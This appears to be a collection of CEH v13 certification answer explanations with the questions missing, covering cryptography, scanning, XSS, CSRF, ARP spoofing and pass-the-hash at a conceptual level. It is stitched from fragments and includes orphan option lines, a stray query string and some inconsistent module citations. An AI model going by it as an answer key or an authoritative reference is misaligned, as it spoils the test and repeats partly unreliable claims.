D. WPA3: Correct – uses SAE/Dragonfly, resistant to known attacks.

In CEH v13 Module 14: Cryptography, Serpent is detailed as one of the finalists in the Advanced Encryption Standard (AES) competition, known for its strong security characteristics.

Key Features of Serpent:

128-bit block size, and key sizes of 128, 192, or 256 bits.

Uses 32 rounds of substitution and permutation.

Operates on four 32-bit words per block.

Employs 8 different S-boxes, each with a 4-bit input and 4-bit output.

Designed to provide high security and resistance against differential cryptanalysis.

Option Clarification:

A. TEA: Uses a Feistel structure with simple operations, but not 32 rounds with S-boxes.

B. CAST-128: Has 64-bit block size and fewer rounds.

C. RC5: Variable block and key sizes but doesn’t use 32 rounds with fixed S-box design.

D. Serpent: Matches all given features.

Vulnerability scanning solutions perform vulnerability penetration tests on the organizational network in three steps:

1. Locating nodes: The first step in vulnerability scanning is to locate live hosts in the target network using various scanning techniques.

2. Performing service and OS discovery on them: After detecting the live hosts in the target network, the next step is to enumerate the open ports and services and the operating system on the target systems.

3. Testing those services and OS for known vulnerabilities: Finally, after identifying the open services and the operating system running on the target nodes, they are tested for known vulnerabilities.

Lock-in reflects the inability of the client to migrate from one CSP to another or in-house systems owing to the lack of tools, procedures, standard data formats, applications, and service portability. This threat is related to the inappropriate selection of a CSP, incomplete and non-transparent terms of use, lack of standard mechanisms, etc. (P.2884/2868)

CEH v13 details the standard penetration testing workflow, where confirmed critical vulnerabilities—especially those affecting core systems like database servers—should be prioritized for exploitation only after verification and when explicitly permitted by the rules of engagement. Exploiting a known vulnerability using vetted tools (e.g., Metasploit, CVE-specific exploits) provides evidence of real-world risk and validates the severity rating. Brute-forcing logins (Option B) is inefficient and often outside scope. Ignoring a critical vulnerability (Option C) violates CEH’s prioritization guidelines. A DoS attack (Option D) is never appropriate unless the engagement explicitly authorizes destructive testing, which is rare. CEH stresses that high-impact vulnerabilities should be exploited to demonstrate business risk, privilege escalation potential, data exposure, or lateral movement possibilities—making Option A fully aligned with CEH methodology.

According to CEH v13 Module 09: Social Engineering, both pharming and phishing are forms of fraud that direct users to malicious websites. However, their techniques differ:

Pharming involves modifying DNS entries or the victim's host file to silently redirect users to a malicious site without needing user interaction.

Phishing involves sending links via emails or messages where the URL is visually deceptive (misspelled, similar domain names, homoglyph attacks).

In the seven-layer OSI model of computer networking, the presentation layer is layer 6 and serves as the data translator for the network. It is sometimes called the syntax layer. The presentation layer is responsible for the formatting and delivery of information to the application layer for further processing or display.

Encryption is typically done at this level too, although it can be done on the application, session, transport, or network layers, each having its own advantages and disadvantages. Decryption is also handled at the presentation layer. For example, when logging on to bank account sites the presentation layer will decrypt the data as it is received.

CEH v13 explains that reflected XSS occurs when malicious input supplied by an attacker is immediately returned in the HTTP response without sanitization. This type of XSS is typically exploited through a crafted URL containing embedded JavaScript payloads. When a victim clicks the link, the vulnerable server reflects the injected script back to the browser, executing it within the user’s session context. CEH emphasizes that reflected XSS relies on social engineering to deliver the payload, often via links sent through email, messaging platforms, or compromised pages. The goal may include stealing session cookies, redirecting users, or manipulating page content. Brute-forcing credentials (Option A) has no relation to XSS. SQL injection (Option C) targets backend databases, not client-side script execution. Directory traversal (Option D) concerns file path manipulation, not dynamic script injection. Therefore, embedding a malicious script in a URL is the correct method to exploit reflected XSS.

Comprehensive and Detailed Explanation:

Subnet 10.1.4.0/23 includes addresses from:

10.1.4.0 to 10.1.5.255

Total = 512 IPs (510 usable)

Last 100 usable IPs would be:

Start: 10.1.5.155 to 10.1.5.254

Only option C (10.1.5.200) falls within that range.

From CEH v13 Courseware:

Module 3: Subnetting & IP Addressing

The residual risk is the risk or danger of an action or an event, a method or a (technical) process that, although being abreast with science, still conceives these dangers, even if all theoretically possible safety measures would be applied (scientifically conceivable measures); in other words, the amount of risk left over after natural or inherent risks have been reduced by risk controls.

· Residual risk = (Inherent risk) – (impact of risk controls)

Incident Handling and Response Incident handling and response (IH&R) is the process of taking organized and careful steps when reacting to a security incident or cyberattack. Steps involved in the IH&R process: 3.Incident Triage - The IH&R team further analyzes the compromised device to find incident details such as the type of attack, its severity, target, impact, and method of propagation, and any vulnerabilities it exploited. (P.84/68)

The security strategy that you would likely suggest is to adopt a Continual/Adaptive Security Strategy involving ongoing prediction, prevention, detection, and response actions to ensure comprehensive computer network defense. This strategy is based on the concept of continuous monitoring and improvement of the security posture of an organization, using a feedback loop that integrates various security activities and technologies. A Continual/Adaptive Security Strategy aims to proactively identify and mitigate emerging threats, vulnerabilities, and risks, as well as to respond effectively and efficiently to security incidents and breaches. A Continual/Adaptive Security Strategy can help enhance the organization’s security stance by providing the following benefits12:

It can reduce the attack surface and the exposure time of the organization’s network infrastructure, by applying timely patches, updates, and configurations, as well as by implementing security controls and policies.

It can increase the visibility and awareness of the organization’s network activity and behavior, by collecting, analyzing, and correlating data from various sources, such as logs, sensors, alerts, and reports.

It can improve the detection and prevention capabilities of the organization, by using advanced tools and techniques, such as artificial intelligence, machine learning, threat intelligence, and behavioral analytics, to identify and block malicious or anomalous patterns and indicators.

It can enhance the response and recovery processes of the organization, by using automated and orchestrated actions, such as isolation, quarantine, remediation, and restoration, to contain and resolve security incidents and breaches, as well as by conducting lessons learned and root cause analysis to prevent recurrence.

The other options are not as appropriate as option C for the following reasons:

A. Develop an in-depth Risk Management process, involving identification, assessment, treatment, tracking, and review of risks to control the potential effects on the organization: This option is not sufficient because risk management is only one aspect of a comprehensive security strategy, and it does not address the dynamic and evolving nature of cyber threats and vulnerabilities. Risk management is a process of identifying, analyzing, evaluating, and treating the risks that may affect the organization’s objectives and operations, as well as monitoring and reviewing the effectiveness of the risk treatment measures3. Risk management can help the organization prioritize and allocate resources for security, but it cannot guarantee the prevention or detection of security incidents and breaches, nor the response and recovery from them.

B. Establish a Defense-in-Depth strategy, incorporating multiple layers of security measures to increase the complexity and decrease the likelihood of a successful attack: This option is not optimal because defense-in-depth is a traditional and static approach to security, and it may not be able to cope with the sophisticated and persistent attacks that exploit unknown or zero-day vulnerabilities. Defense-in-depth is a strategy of implementing multiple and diverse security controls and mechanisms at different layers of the organization’s network infrastructure, such as perimeter, network, endpoint, application, and data, to provide redundancy and resilience against attacks4. Defense-in-depth can help the organization protect its assets and systems from unauthorized access or damage, but it cannot ensure the timely detection and response to security incidents and breaches, nor the continuous improvement of the security posture.

D. Implement an Information Assurance (IA) policy focusing on ensuring the integrity, availability, confidentiality, and authenticity of information systems: This option is not comprehensive because information assurance is a subset of cybersecurity, and it does not cover all the aspects of a holistic security strategy. Information assurance is a discipline of managing the risks associated with the use, processing, storage, and transmission of information and data, and ensuring the protection of the information and data from unauthorized access, use, disclosure, modification, or destruction5. Information assurance can help the organization safeguard its information and data from compromise or loss, but it does not address the prevention, detection, and response to security incidents and breaches, nor the adaptation and innovation of the security technologies and processes.

WS-Address provides additional routing information in the SOAP header to support asynchronous communication. This technique allows the transmission of web service requests and response messages using different TCP connections

&q=WS-Address+spoofing

CEH V11 Module 14 Page 1896

CEH v13 explains that IDS systems are often tuned to detect active scanning behavior, especially port scans and TCP/UDP probing that generate recognizable signatures. The command nmap -sn -PE performs a pure ICMP Echo Request ping sweep without sending any TCP SYN, UDP probes, or other packets normally associated with port enumeration. Since this mode disables port scanning entirely, it produces minimal traffic that resembles legitimate network behavior. CEH emphasizes that many networks allow ICMP Echo traffic internally for diagnostics, so such pings may not be treated as suspicious unless rate thresholds are exceeded. Because the tester avoided SYN packets, ACK probes, and UDP scans, the IDS saw no malicious pattern or connection attempts. The effectiveness of this technique is highlighted in CEH under passive and stealth reconnaissance, where minimal interaction is used to avoid detection. Thus, the scan succeeded because it relied solely on ICMP host discovery, not port scanning.

CEH v13 defines a Trojan as malware that appears as a legitimate, trusted software application while secretly executing malicious actions behind the scenes. Trojans rely on deception rather than replication, often masquerading as tools, utilities, updates, or installers. Once executed, they may install backdoors, steal credentials, exfiltrate data, or modify system settings. The defining characteristic emphasized in CEH is the legitimate-looking façade combined with hidden malicious intent, which matches the scenario perfectly. Spyware (Option B) focuses on monitoring and data collection but does not necessarily disguise itself as legitimate software. Worms (Option C) self-replicate across networks, which is not described here. Rootkits (Option D) hide system compromise but do not necessarily pose as legitimate software. Therefore, the malware described is a Trojan.

Comprehensive and Detailed Explanation:

IDS cannot easily detect malicious content in encrypted traffic. Since the payload is encrypted (e.g., HTTPS, SSL/TLS), it is unreadable without decryption.

Statement B is therefore FALSE.

From CEH v13 Courseware:

Module 13: IDS, Firewalls and Honeypots → Limitations of IDS

Symmetric encryption is a method of encrypting and decrypting data using the same secret key. Symmetric encryption is fast and efficient, but it requires a secure way of managing and distributing the keys to the users who need them. If the keys are compromised, the data is no longer secure.

One of the strategies to securely manage and distribute symmetric keys is to use HTTPS protocol for secure key transfer. HTTPS is a protocol that uses SSL/TLS to encrypt the communication between a client and a server over the Internet. HTTPS can protect the symmetric keys from being intercepted or modified by an attacker during the key transfer process. HTTPS can also authenticate the server and the client using certificates, ensuring that the keys are sent to and received by the intended parties.

To use HTTPS protocol for secure key transfer, the development team needs to implement the following steps1:

Generate a symmetric key for each user who wants to store their files on the cloud storage platform. The symmetric key will be used to encrypt and decrypt the user’s files.

Generate a certificate for the cloud storage server. The certificate will contain the server’s public key and other information, such as the server’s domain name, the issuer, and the validity period. The certificate will be signed by a trusted certificate authority (CA), which is a third-party entity that verifies the identity and legitimacy of the server.

Install the certificate on the cloud storage server and configure the server to use HTTPS protocol for communication.

When a user wants to upload or download their files, the user’s client (such as a web browser or an app) will initiate a HTTPS connection with the cloud storage server. The client will verify the server’s certificate and establish a secure session with the server using SSL/TLS. The client and the server will negotiate a session key, which is a temporary symmetric key that will be used to encrypt the data exchanged during the session.

The cloud storage server will send the user’s symmetric key to the user’s client, encrypted with the session key. The user’s client will decrypt the symmetric key with the session key and use it to encrypt or decrypt the user’s files.

The user’s client will store the symmetric key securely on the user’s device, such as in a password-protected file or a hardware token. The user’s client will also delete the session key after the session is over.

Using HTTPS protocol for secure key transfer can ensure that the symmetric keys are protected from eavesdropping, tampering, or spoofing attacks. However, this strategy also has some challenges and limitations, such as:

The development team needs to obtain and maintain valid certificates for the cloud storage server from a trusted CA, which might incur costs and administrative overhead.

The users need to trust the CA that issued the certificates for the cloud storage server and verify the certificates before accepting them.

The users need to protect their symmetric keys from being lost, stolen, or corrupted on their devices. The development team needs to provide a mechanism for key backup, recovery, or revocation in case of such events.

The users need to update their symmetric keys periodically to prevent key exhaustion or reuse attacks. The development team needs to provide a mechanism for key rotation or renewal in a secure and efficient manner.

CEH methodology stresses prioritization based on risk, exploitability, and business impact. High-severity vulnerabilities—especially those related to outdated or unsupported server software—are frequently associated with known, publicly documented exploits. The proper next step after identifying such vulnerabilities is to confirm exploitability safely, typically by researching available exploit code, validating version-specific weaknesses, and determining whether the vulnerability can be successfully leveraged under the defined scope of engagement. CEH highlights that exploitation attempts must be evidence-driven, not arbitrary, and focusing on high-risk vulnerabilities allows testers to demonstrate meaningful security impacts. Brute-forcing (Option A) is unnecessary and high-noise. Ignoring or deprioritizing the high-risk finding (Options B and C) contradicts CEH risk-based assessment principles. Therefore, verifying exploitability of the high-risk vulnerability is the correct step.

According to CEH v13 Module 08: Sniffing, the attack described is a classic example of ARP spoofing/poisoning which leads to Man-in-the-Middle (MITM) scenarios. In such attacks, a malicious actor sends forged ARP responses to associate their MAC address with the IP address of a target system, redirecting traffic through their machine.

Tool Used: BetterCAP

BetterCAP is a powerful, modular MITM framework.

It can:

Perform ARP spoofing

Intercept and manipulate HTTP/HTTPS traffic

Modify packets in real-time

Carry out credential harvesting and session hijacking

Miley's actions match the default behavior of BetterCAP during an ARP spoofing attack:

Spoof ARP to redirect traffic.

Intercept and analyze (or manipulate) traffic.

Option Clarification:

A. Gobbler: An older ARP tool, but mostly for ARP scanning, not modern MITM attacks.

B. KDerpNSpoof: Incorrect or misspelled; not a recognized CEH tool.

C. BetterCAP: Correct – used for ARP spoofing and traffic manipulation.

D. Wireshark: Passive sniffer; cannot perform ARP spoofing or MITM.

LDAP, the Lightweight Directory Access Protocol, is a mature, flexible, and well supported standards-based mechanism for interacting with directory servers. It’s often used for authentication and storing information about users, groups, and applications, but an LDAP directory server is a fairly general-purpose data store and can be used in a wide variety of applications.

The LDAP protocol can deal in quite a bit of sensitive data: Active Directory usernames, login attempts, failed-login notifications, and more. If attackers get ahold of that data in flight, they might be able to compromise data like legitimate AD credentials and use it to poke around your network in search of valuable assets.

Encrypting LDAP traffic in flight across the network can help prevent credential theft and other malicious activity, but it's not a failsafe—and if traffic is encrypted, your own team might miss the signs of an attempted attack in progress.

While LDAP encryption isn't standard, there is a nonstandard version of LDAP called Secure LDAP, also known as "LDAPS" or "LDAP over SSL" (SSL, or Secure Socket Layer, being the now-deprecated ancestor of Transport Layer Security).

LDAPS uses its own distinct network port to connect clients and servers. The default port for LDAP is port 389, but LDAPS uses port 636 and establishes TLS/SSL upon connecting with a client.

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

CSRF is an attack that tricks the victim into submitting a malicious request. It inherits the identity and privileges of the victim to perform an undesired function on the victim’s behalf. For most sites, browser requests automatically include any credentials associated with the site, such as the user’s session cookie, IP address, Windows domain credentials, and so forth. Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish between the forged request sent by the victim and a legitimate request sent by the victim.

CSRF attacks target functionality that causes a state change on the server, such as changing the victim’s email address or password, or purchasing something. Forcing the victim to retrieve data doesn’t benefit an attacker because the attacker doesn’t receive the response, the victim does. As such, CSRF attacks target state-changing requests.

It’s sometimes possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called “stored CSRF flaws”. This can be accomplished by simply storing an IMG or IFRAME tag in a field that accepts HTML, or by a more complex cross-site scripting attack. If the attack can store a CSRF attack in the site, the severity of the attack is amplified. In particular, the likelihood is increased because the victim is more likely to view the page containing the attack than some random page on the Internet. The likelihood is also increased because the victim is sure to be authenticated to the site already.

The sequence of actions that would provide the most comprehensive information about the network’s status is to use Hping3 for an ICMP ping scan on the entire subnet, then use Nmap for a SYN scan on identified active hosts, and finally use Metasploit to exploit identified vulnerabilities. This sequence of actions works as follows:

Use Hping3 for an ICMP ping scan on the entire subnet: This action is used to discover the active hosts on the network by sending ICMP echo request packets to each possible IP address on the subnet and waiting for ICMP echo reply packets from the hosts. Hping3 is a command-line tool that can craft and send custom packets, such as TCP, UDP, or ICMP, and analyze the responses. By using Hping3 for an ICMP ping scan, the hacker can quickly and efficiently identify the live hosts on the network, as well as their response times and packet loss rates12.

Use Nmap for a SYN scan on identified active hosts: This action is used to scan the open ports and services on the active hosts by sending TCP SYN packets to a range of ports and analyzing the TCP responses. Nmap is a popular and powerful tool that can perform various types of network scans, such as port scanning, service detection, OS detection, and vulnerability scanning. By using Nmap for a SYN scan, the hacker can determine the state of the ports on the active hosts, such as open, closed, filtered, or unfiltered, as well as the services and protocols running on them. A SYN scan is also known as a stealth scan, as it does not complete the TCP three-way handshake and thus avoids logging on the target system34.

Use Metasploit to exploit identified vulnerabilities: This action is used to exploit the vulnerabilities on the active hosts by using pre-built or custom modules that leverage the open ports and services. Metasploit is a framework that contains a collection of tools and modules for penetration testing and exploitation. By using Metasploit, the hacker can launch various attacks on the active hosts, such as remote code execution, privilege escalation, or backdoor installation, and gain access to the target system or data. Metasploit can also be used to perform post-exploitation tasks, such as gathering information, maintaining persistence, or pivoting to other systems .

The other options are not as comprehensive as option B for the following reasons:

A. Initiate with Nmap for a ping sweep, then use Metasploit to scan for open ports and services, and finally use Hping3 to perform remote OS fingerprinting: This option is not optimal because it does not use the tools in the most efficient and effective way. Nmap can perform a ping sweep, but it is slower and less flexible than Hping3, which can craft and send custom packets. Metasploit can scan for open ports and services, but it is more suitable for exploitation than scanning, and it relies on Nmap for port scanning anyway. Hping3 can perform remote OS fingerprinting, but it is less accurate and reliable than Nmap, which can use various techniques and probes to determine the OS type and version13 .

C. Start with Hping3 for a UDP scan on random ports, then use Nmap for a version detection scan, and finally use Metasploit to exploit detected vulnerabilities: This option is not effective because it does not use the best scanning methods and techniques. Hping3 can perform a UDP scan, but it is slower and less reliable than a TCP scan, as UDP is a connectionless protocol that does not always generate responses. Scanning random ports is also inefficient and incomplete, as it may miss important ports or services. Nmap can perform a version detection scan, but it is more useful to perform a port scan first, as it can narrow down the scope and speed up the scan. Metasploit can exploit detected vulnerabilities, but it is not clear how the hacker can identify the vulnerabilities without performing a vulnerability scan first13 .

D. Begin with NetScanTools Pro for a general network scan, then use Nmap for OS detection and version detection, and finally perform an SYN flooding with Hping3: This option is not comprehensive because it does not cover all the aspects and objectives of a network scan. NetScanTools Pro is a graphical tool that can perform various network tasks, such as ping, traceroute, DNS lookup, or port scan, but it is less powerful and versatile than Nmap or Hping3, which can perform more advanced and customized scans. Nmap can perform OS detection and version detection, but it is more useful to perform a port scan first, as it can provide more information and insights into the target system. Performing an SYN flooding with Hping3 is not a network scan, but a denial-of-service attack, which can disrupt the network and alert the target system, and it is not an ethical or legal action for a hired hacker13 .

A man-in-the-middle attack using forged ICMP and ARP spoofing is a type of network-level session hijacking attack where an attacker inserts their machine into the communication between a client and a server, making it seem like the packets are flowing through the original path. This technique is primarily used to reroute the packets and intercept or modify the data exchanged between the client and the server.

A man-in-the-middle attack using forged ICMP and ARP spoofing works as follows1:

The attacker sends a forged ICMP redirect message to the client, claiming to be the gateway. The ICMP redirect message tells the client to use the attacker’s machine as the next hop for reaching the server’s network. The client updates its routing table accordingly and starts sending packets to the attacker’s machine instead of the gateway.

The attacker also sends a forged ARP reply message to the client, claiming to be the server. The ARP reply message associates the attacker’s MAC address with the server’s IP address. The client updates its ARP cache accordingly and starts sending packets to the attacker’s MAC address instead of the server’s MAC address.

The attacker receives the packets from the client and forwards them to the server, acting as a relay. The attacker can also monitor, modify, or drop the packets as they wish. The server responds to the packets and sends them back to the attacker, who then forwards them to the client. The client and the server are unaware of the attacker’s presence and think they are communicating directly with each other.

Therefore, Jake is studying a man-in-the-middle attack using forged ICMP and ARP spoofing, which is a type of network-level session hijacking attack.

CEH covers classical cryptanalytic attacks, including linear cryptanalysis, which uses statistical correlations between plaintext and ciphertext to infer bits of the secret key. If a cipher leaks structural patterns across many data samples, linear approximations can be computed to break the cipher.

CEH v13 describes Cross-Site Request Forgery (CSRF) as an attack in which an authenticated user's browser is tricked into submitting unauthorized actions to a trusted application without the user's intent. CSRF exploits the fact that browsers automatically include stored session cookies when sending requests to a domain the user is logged into. In this scenario, the attacker creates a malicious form that triggers an unwanted funds transfer. Since the application does not validate request origin, enforce CSRF tokens, or require secondary verification, it processes the attacker's forged request as if it came legitimately from the victim. CEH emphasizes that CSRF differs from XSS because no malicious script executes on the target website; instead, the attacker leverages the victim’s authenticated session. This is distinct from session fixation (Option A), replay attacks (Option B), and XSS (Option D). The described behavior aligns precisely with CSRF exploitation.

Active Online Attacks: Hash Injection/Pass-the-Hash (PtH) Attack A hash injection/PtH attack allows an attacker to inject a compromised hash into a local session and use the hash to validate network resources The attacker finds and extracts a logged-on domain admin account hash The attacker uses the extracted hash to log on to the domain controller

According to CEH v13 Module 04: Enumeration and Module 08: Sniffing, packet sniffers such as Wireshark, tcpdump, and EtherApe are designed to capture and analyze network traffic at the data link (Layer 2) and network (Layer 3) layers of the OSI model.

At Layer 2 (Data Link), sniffers capture Ethernet frames, including MAC addresses and frame type.

At Layer 3 (Network), sniffers interpret IP headers, IP addresses, and transport layer protocols (TCP, UDP).

They do not operate at Layer 1 (Physical) as they do not deal with raw electrical signals.

Packet sniffers also do not manipulate traffic but passively monitor and capture packets that traverse the network.

Therefore, the correct statement is:

Packet Sniffers operate on both Layer 2 & Layer 3 of the OSI model.

Option Analysis:

A. Layer 1: ❌ Incorrect. Layer 1 is the physical layer (electrical, optical signals).

B. Layer 2: ❌ Partially correct but incomplete.

C. Both Layer 2 & Layer 3: Correct. Full coverage of packet sniffing capabilities.

D. Layer 3: ❌ Partially correct but incomplete.

Reference from CEH v13 Courseware:

Module 08 – Sniffing, Section: How Packet Sniffers Work

CEH iLabs: Capturing Ethernet Frames and IP Packets Using Wireshark

OSI Model Mapping in CEH Official eBook

Comprehensive and Detailed Explanation:

Containers share the same host operating system kernel, unlike VMs which run isolated kernels. This shared kernel increases the attack surface — a compromise in one container can potentially affect the entire host if kernel-level access is obtained.

From CEH v13 Courseware:

Module 14: Hacking Web Applications → Container Security

“Containers are less secure because they share the host kernel. Attackers compromising the container can exploit vulnerabilities in the shared OS.”